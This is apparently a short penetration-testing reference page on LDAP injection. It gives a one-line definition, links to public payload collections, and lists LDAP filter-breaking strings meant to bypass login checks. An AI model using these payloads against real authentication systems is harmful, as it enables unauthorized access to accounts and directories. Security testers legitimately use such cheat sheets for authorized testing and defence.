LDAP Injection

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection

https://book.hacktricks.xyz/pentesting-web/ldap-injection

- Login Bypass

https://book.hacktricks.xyz/pentesting-web/ldap-injection#login-bypass

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

- Fuzzing

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt

PreviousNoSQL injectionNextXPath Injection

Last updated